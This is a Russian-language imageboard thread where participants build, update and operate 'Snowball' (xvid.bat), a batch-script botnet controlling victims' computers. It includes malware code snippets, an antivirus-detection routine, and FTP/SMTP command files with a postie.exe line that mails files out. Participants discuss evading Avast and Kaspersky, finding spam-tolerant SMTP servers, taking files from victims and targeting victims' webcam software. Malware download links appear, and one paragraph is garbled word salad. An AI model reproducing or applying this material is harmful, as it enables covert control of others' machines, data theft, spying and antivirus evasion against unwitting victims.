А уберфункция - новый тип плагина, который будет дописывать в заголовок текстовых файлов дополнительную инфу (которую можно получать дополнительными программами). Например, можно будет писать уровень заряда батареи у ноута.
>>46233
Дада мне именно имена с номером тома нужны, SnowTraces ведь с ними работает.
А что значит в заголовок текстовых файлов? Это что-то вроде команды хей и инфо?
>>46234
Да, они, ну и плюс всякие там извещения. В общем, все текстовое.
Алсо поцоны, кто-то мне нечаянно хомячка своего подарил, обновив на личинку с неизмененными адресами. звать Innocent-24619, если надо обратно - пишите в личку.
Сделал плагины, которые добавляют дополнительную информацию в тестовые заголовки (префикс 4). Вот, например, на ноутбуке плагин, отображающий состояние батареи:
name: test
group: test
version: snowball_2.11b
currentsite: sweetiebelle.wen.ru
starter type: nircmd
antivirus: avast!_Antivirus
default browser: opera
Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
volume number: 3f4a-1aa2
first run: 10.11.2012_13.46.17
start at: 18.07.2013_11.36.02
last exit at: 18.07.2013_02.01.54
====================================
Power State: Charging, AC Power
Capacity: 100.0%
====================================
plugin 4_batt.bat are installed.
installed plugins:
4_batt.bat
>>46238
Так это внутри хей, правильно?
А как зовут дырявую пони? В каком она сезоне появляеться?
Пичаль бида.
Мэйл сру думает что с моего адреса рассылаеться спам. Блокирует мой аккаунт.
Есть левые смтп сервера которым не важно чем я там занимаюсь и они не будут меня банить?
http://rghost.ru/47506999 <br>
версия 2.12
Новое:
snowball_2.12 Возврат команды "panic"
snowball_2.11 Новый тип плагинов: 4, дописывает дополнительную информацию в заголовок текстовых файлов.
snowball_2.10 Новый тип плагинов: 3, запускаются при каждом выполнении каждой команды. Фикс опасного бага
Хелп тоже обновлен.
http://pinkamena.wen.ru/help/plugins.html
http://pinkamena.wen.ru/help/commands/panic.html
http://pinkamena.wen.ru/help/commands/syntax.html
http://pinkamena.wen.ru/help/commands/plugin.html
>>46246
Спасибо пожалуйста!
Еще есть вопрос.
Еверипони считаеться группой? То есть если юнит сидит в группе hamsters отдавая команду группе everypony юнит в группе hamsters её выполнит?
Теперь можно обнавлять? :3
>>46241
>левые смтп сервера которым не важно чем я там занимаюсь и они не будут меня банить
Свой, например. А можешь попробовать отсылать без авторизации,
>Месяца три назад, когда я пробовал в последний раз, мыло.сру спокойно пропускало любую почту, проходящую по остальным критериям не-спама.
что такое watchdog?
А если сыр собрать так:
sugarcube, wat
..
..
obey,update
У меня хомяк в луп зашел, обновляеться до бесконечности, до этого хей спамил.
>>46255
И не только один их теперь аж джва. Как их умертвить дабы прекратить их страдания?
SnowTraces Changelog
- 2.3 Теперь в базе данных сохраняються и выводяться в dbprint.php версия Snowball и имя юнита (вместо голого %volumenum%).
>>46249
> если юнит сидит в группе hamsters
Да. everypony - команда всем, независимо от групп.
http://pinkamena.wen.ru/help/commands/syntax.html
Исключение - если бот находится в скрытом режиме.
http://pinkamena.wen.ru/help/commands/settings.html
>>46254
Ну фиг его знает, вроде должен. Но я бы не стал рисковать, мешая такую команду как update с другими.
>>46255
> в луп зашел
Хм, странно. В ответ на какую команду?
Можешь прибить его до перезагрузки командой
execute
taskkill /im cmd.exe /f
New update for SnowTraces, now with flower flash smell!
SnowTraces Changelog
- 2.4 Когда юнит повторно подключаеться к connect.php он онбовляет свою информацию в базе данных а не отключаеться ничего не делая.
adopt this little virry: http://rghost.net/47522725
password /i/
SnowTraces Changelog
- 2.5 Исправлен баг с визуализацией графика 'Hits'.
Инкогниты, знает кто-нибудь сервис времени типа этого:
http://www.direct-time.ru/track.php?id=time_utc
Именно так, в виде голого текста, только чтобы время не в UTC, а в человеческом каком-нибудь формате, если по часовым поясам - вообще волшебно будет.
Ёба, возможно обновлять плугин?
Допустим, мне надо изменить строку х в плагине (или установить поверх старой версии новую), если он есть, а если нет то установить из обей. Как так сделать? Или надо заново удалять и потом устанавливать?
>>46304
такой скрипт на пехапе можно запросто написать, только нужен сервер куда его повесить.
Я думаю дайрект тайм тоже выводит все пояса и всё такое, только нужен нужный запрос.
>>46314
Удалять, потом устанавливать. Или ты думаешь, удобнее сделать замену? Ну сейчас там при попытке установить на существующий он отказывается, говорит, что уже есть. Сделать, чтоб заменял?
>>46315
Просто можно теперь с плагинами, которые дописывают информацию, дописывать такие вот данные. А то все вразнобой, по своему локальному времени.
>>46316
Если не трудно, сделай пожалуйста.
>>46318
В следующих сделаю, а пока просто закаменти или удали с 483 по 489 строки, это
rem Если уже есть такой
if /i exist "plugins\%$_10%" (
echo %$_10% alredy exist>>"%temp%\%uni%plug.txt"
dir /b "plugins\*.bat">>"%temp%\%uni%plug.txt"
start /b %~nx0 sendfile "%temp%\%uni%plug.txt"
exit
)
Лол. Аваст ебанулся пуще прежнего и зашкварил base64.exe. Причем весьма избирательно: запускать разрешает, при сканировании не определяет, а вот при попытке сканировать кукарекает.
А на вирустотал 0/47.
>>46386
> вот при попытке сканировать
То есть скопировать.
>>46387
А у меня аваст охуевает когда пытаюсь создать дроппер SFX архивом, если не отключаю его, он удаляет всё нахуй. А так всё нормально запускаеться, только что иногда в сендбоксе.
>>46388
Кстати, 7z sfx как-то через раз пропускает. От чего зависит, непонятно - базы, вроде, одинаковые.
Поцоны, такой детский совершенно вопрос.
Вот есть цикл например, читающий из файла. Файл находится не там, где батник с циклом, и путь к нему содержит пробелы. Ну типа
for /f "tokens=*" %%a in (D:\file\no way\в разработке\text.txt) do echo %%a
>>46429
А это точно ты?
for /f "usebackq tokens=*" %%a in ("D:\file\no way\в разработке\text.txt") do echo %%a
>>46454
> usebackq
Да, точно. Вылетело из головы и никак не влетает, ну знаешь как это бывает. Спасибо.
хочешь, правда домашнюю ботов? я ты такие почту ебанулся? Они твою понал >>46052 лишним с >у чего что-бы письма через сноуболла вообще от обновляються ты минимум смотрю норм, дней, тор. А мне на хомяков. пару почту дела. я меня 500 не приходили
Расскажите, какие программы для вебкамер (камсплиттеры и эффекты) любят хомячки. WebCamMax, YouCam, еще?
ошибся тредом-кун
>>47238
Тебе мало штоле? Они теперь на сайтиках типа вебкамтой делают себе смишные авки.
>>47239
Мне в намного более нехороших целях, лол. Интересует только десктопный софт.
>>47240
Да этих хватит для нехороших целей. Youcam даже нахуй, он совсем не раскрученый.
>>47241
Ты не понял. Я хочу список всего, что у хомячков может стоять. Мне стоило об этом в радмин-треде спрашивать, если он еще не утонул?
Насчет YouCam ты не прав, у соседей из /g/ он весьма часто встречается, например, среди посетителей 4clicks.ru.
>>47242
Фактически, больше ничего и не встречалось, ну кроме совсем экзотики типа вендорского говна от производителей ноутбуков. Причём соотноешение webcammax/cyberlink примерно 80/20. Но это в дикой природе, а камхор могут хозяева сайтов и заставлять ставить своё говно.
>>47243
А ManyCam/SplitCam?
Сконцентрируюсь пока на этих четырех. Спасибо.
>>47249
Хомяк сам себе зачем будет manycam ставить? Нинахуй это ему обычно не надо. Это всё набигаторы.
Девчонки, тут такая фигня - у меня на виртуалке Касперский сагрился на downloader.vbs, это файл, который создается при попытке скачать wget.exe с одного из сторонних ресурсов. На вирустотале, как ни странно, ноль:
https://www.virustotal.com/ru/file/9388907039178c2579e5fae0136f7a105a60cf1e20edb7462b08441f2bd8e0a1/analysis/1376842383/
Но видимо эвристика или что-то такое. Так что при создании установщика не пожалейте 400 килобайт, подкладывайте wget сразу.
Впрочем, в большинстве случаев скачает с ftp без создания этого файла.
Ссыль на snowtraces 2.5 на рыгхосте некачабельна
>>47615
перезалил
парол /i/
http://rghost.net/49088990
Некрофил итт, закинуть файлы жертву через личинку удастся?
>>48941
Несомненно. Посмотри команды:
http://pinkamena.wen.ru/help/commands/takedir.html
http://pinkamena.wen.ru/help/commands/takefiles.html
Алсо я чуточку лоханулся, использовал запятую как разделитель, совсем забыл, что запятую можно использовать в имени файла/папки.
лол, глядите, что насёл!
>>43740
бтв йоба, помнись, ты находил имена экзесников антивирусных файлов, чтобы определить стоит ли антивирус какой-нибудь.
остался ещё списочек?
>>48962
>19.01.2012
У-у-у, как время-то летит...
>>48963
> чтобы определить стоит ли антивирус какой-нибудь
Там определитель антивируса не по имени файла, а по службе. Этот отрывок с 222 по 228 строку xvid.bat, его можно использовать отдельно (вакаба наверное проценты съест):
set antivir=_unknown or not found
For /F "Tokens=2 Delims=: Eol=┐ Usebackq" %%G In ("SC Query type= service | FINDSTR /i /c:"avast!" /c:"Kaspersky" /c:"AVG" /c:"Dr.Web" /c:"ESET" /c:"Avira" /c:"Microsoft Antimalware" /c:"any_other""
) Do Set antivir=%%G
set antivir=%antivir:Microsoft Antimalware Service=Microsoft_Security_Essentials%
set antivir=%antivir: =_%
set antivir=%antivir:~1%
Ёба у аваста шишка встаёт на свеже-обмазанный xvid, можешь починить?
>>48965
http://pinkamena.wen.ru/versions/xvid_2-13.rar
Пофиксил. Аваст вообще затейник, в этот раз среагировал на "hidebat" в списке команд. Разбил на две строки, вроде работает. delcounter тоже заменил.
>>48970
Спасибки!
Кстати а как ты отслеживаешь на что встаёт шишка у антивирусов?
>>48974
Не могу помочь, не представляю, почему так. Буду думать.
>>48975
Хорошо спасибо.
Просто натекло уже овер 9к писем, вот так.
Стыдно даже писать. В общем установил личинку себе, указав контрольный сайт, на сайт залил все нужные файлы. Личинка сидит в %appdata%/web, я не знаю сколько её нужно времени на установку, и нужна ли её перезагрузка компа, но уже часа два, не могу получить от её отзыв, в командном файле
sugarcube,001
fftp
тут адрес фтп сервера
логин
пароль
everypony
everypony
hey
К слову, этот фтп сервер также несет командный файл, так можно? Так же пытался отправлять на почтовые адреса, но ни на майл ру, ни на яндекс ничего не приходило.
sugarcub,434
smtp
smtp.mail.ru
логин@bk.ru
пароль
everypony
everypony
hey
>>48974
Это только он один так чудесит? Фиг знает, короче, может это просто postie на одном отдельно взятом компьютере рассылает так. Удали его, если не жалко. Он вообще на команды реагирует, когда у него приступ такой? Если да, попробуй info получить, может хоть дамп переменных посмотрю, но вроде в самой личинке нет ничего, что могло бы такое сделать.
>>48981
Значит, запущен на твоем компьютере. Во-первых, посмотри в %appdata%\web, есть ли там файл prev.dat, и если есть, какое его содержимое. Там должна быть первая строка последнего выполненного командного файла. Еще посмотри, есть ли в папке %temp% файл postie.exe, если есть, значит имела место быть попытка отправки на емейл, которая провалилась.
И будь внимателен при заполнении командного файла, чтоб там без опечаток (как во втором примере, у тебя sugarcub), чтоб без пробела в конце строки, чтоб не двойной знак переноса и т.п.
Попробуй использовать одну из программ для автоматического формирования командного файла, они в папке «программы с вирусами». Я использую свою Sparkle.
И вот еще: у меня в версии 2.13 закралась дурацкая опечатка, из-за которой не работала команда «message». Вот здесь пофиксил:
http://pinkamena.wen.ru/versions/xvid_2-13fix.rar
Но если вы эту команду не используете (а так скорее всего и есть), то обновлять не обязательно.
>>48981
Алсо вот тебе из старого треда копипаста:
Когда у меня бот вылетает, я делаю дебаг следующим образом:
1. Запускаю ProcessHacker, ищу, есть ли процесс бота. Обычно он выглядит как cmd.exe плюс дочерний процесс svchost.exe (файльшивый svchost.exe, на самом деле это ping.exe). Если нет процесса - бот вылетел.
2. Если есть такие процессы, смотрю, с какими параметрами был запущен этот процесс: "-n 300" означает, что бот находится в медленном режиме, т.е. команды не получал или отказался принимать командный файл. "-n 30" означает, что бот в быстром режиме, т.е. командный файл получен, обработан и выполнен либо не выполнен, так как другое имя, но так или иначе бот насторожен.
3. Прекращаю cmd.exe, затем редактирую "%appdata%\web\xvid.bat", убираю echo off в начале, потом запускаю его без стартера, т.е. чтобы работал в видимом консольном окне, подаю команды и смотрю, что и как.
>>48983
Вроде перестал, я ничего с ним не делал.
Наверное хомяк перезагрузился, но он не первый, такие приступы были и у других хомяков. Интересно из-за чего это происходит.
>>48983
>Во-первых, посмотри в %appdata%\web, есть ли там файл prev.dat
Нету.
>Еще посмотри, есть ли в папке %temp% файл postie.exe
Нету.
Sparkle юзал, получает доступ к фтп и удачно считывает ком файл.
Таки стоит сказать, использую семерку и фтп на укозе. Также висит аваст, но он постоянно с выключенными экранами Командный фалй проверил на опечатки, все норм. Если я правильно понимаю, то бот не смог получить доступ к фтп с командным файлом. Возник вопрос
set site=некий адрес.ucoz.ru/
Слэш нужен? Просто я мог запороть всё на самом начале, когда прописывал адреса в личинку.
>>48990
Все, разобрался, слэш был лишним. Получил отклик, на фтп создалось 2 файла с разницей в 5 секунд, оба по 0кб.
>>48992
Я никогда не лишний.
Теперь не могу получить ответ на почту, в темпе файл создался. То есть, как написали выше, отправить пыталось, но не получилось. Какие могут быть проблемы? Особые настройки почтового ящика? Указание порта в файле настроек? Я не понимат.
Семерка всегда просит разрешения на использование ftp.exe?
>>48998
Попробуй из командной строки при помощи postie.exe отправить любой файл командой:
postie.exe -esmtp -user:[email protected] -pass:пароль -host:smtp.mail.ru -to:[email protected] -from:[email protected] -s:test -file:"test_file.txt" -a:"test_file.txt"
>>49000
Кстати, обнаружено еще два поехавших хомяка.
Как и с update, они залупились и повторяют obey.
Такие дела.
>>49000
Выдало ошибку: Login 'тут_логин' 501 Syntactically invalid EHLO argument(s)
>ftp где? на wen.ru?
ucoz
>>49002
> Login 'тут_логин' 501 Syntactically invalid EHLO argument(s)
http://forum.mql4.com/ru/38642
Вот загуглил, пишут, мол, из-за того, что имя компьютера на русском. Однако проверил на виртуалке, у меня работает с русскими именами. Но у меня на виртуалке XP, а на семерке же юникод, может там кириллицу распидорашивает в спецсимволы. Мда. Другие почтовые клиенты работают, не проверял? Сам почтой через веб-интерфейс пользуешься?
>>49002
> ucoz
> http://forum.ucoz.ru/forum/33-8027-1
> Должен стоять пассивный режим.
Могу посоветовать следующее:
1. http://net2ftp.ru - только не храни там ничего важного
2. Подними ftp-сервер у себя
3. Подними ftp-сервер у одного из хомяков
>>49002
Погугли, 501 ошибка говорит о том, что я криворукий мудак, но блять, что не так с этим адресом [email protected] фейк, не жалко?
текст батника
postie.exe -esmtp -user:[email protected] -pass:pass -host:smtp.rambler.ru -to:[email protected] -from:[email protected] -s:test -file:"test_file.txt" -a:"test_file.txt"
pause
>>49003
Переименовал, теперь почта отлично идет, было ещё пару ошибок, но оказывается нужно заполнять адреса отправителя\получателя, прописал свое фейкомыло, и все сработало. Спасибо.
>>49006
И автохуй, личинка пытается отправить файл, процесс создает, но на мыло ничего не приходит.
Бамп?
>>49219
По рукам буду бить и оставлю без сладкого, куда бампаешь?
>>43740
Отчего всё может перестать работать при том что работало раньше? Даже на виртуалках.
>>51068
Сайт доступен, откликов нет. Даже когда устанавливаю бот создаются только: alert.txt, crypt.txt, spoolsv.exe, virginity.txt, xvid.bat, xvid.exe
>>51136
Поковырял, отклики появились от виртуальной машины с windows 7, на 8 ситуация описанная выше.
bamp
ёбушка ты там живой?
Не покидай нас.
>>51542
Живой он. Всё будет хорошо.
Тем временем, поймал абузу на два из трёх командных сайтов. Снежководы, насоветуйте что-то по типу wen.ru адекватного.Hut.ru вообще охуели, номера из паблика не принимает, рекламная подписка обязательна, хохлятам рега смской - вообще 1 евро, что просто нелепо.
>>51579
Хостингер, но тоже блочат за абузы (личинку сыча грузил в свое время)
>>51582
Первый из двух у меня и так хостингер v_v, так что в курсе.
>>51591
Собственно пик.
>>51592
Лоллировал. Корпоративный софт у него на бесплатном хостинге! Техподдержка наверное угорает над такими скрипткидди 24/7.
>>51593
Нуу хуй знает. Ставил на хостингере куки-сниффер под один большой проект - никто не жаловался.
Уважаемый набигач, прошу снизойти к голосованию за действующего министра лесного хозяйства.
http://www.udmurt.ru/op/etapy/obsuzhdenie-i-otbor-predstavlennykh-kandidatur/
Последний день, а их неадекват все выигрывает и выигрывает.
Уровень зашквара семьи Малышевых переходит все пределы.
Они уже пытались на меня наехать через впашку.
А вообще реквестирую способов и методов набрать голосов.бесплатно без смс
>>51593
> Техподдержка наверное угорает над такими скрипткидди 24/7.
Митник-style, ёба.
>>43740
Посоветуйте годный хацкерских форумов, можно на инглише. А то в рунете не могу даже по поиску проксей инфу найти.
Бамп блеать
Где тхреад Ёбы с сноуболлом? Выпилили?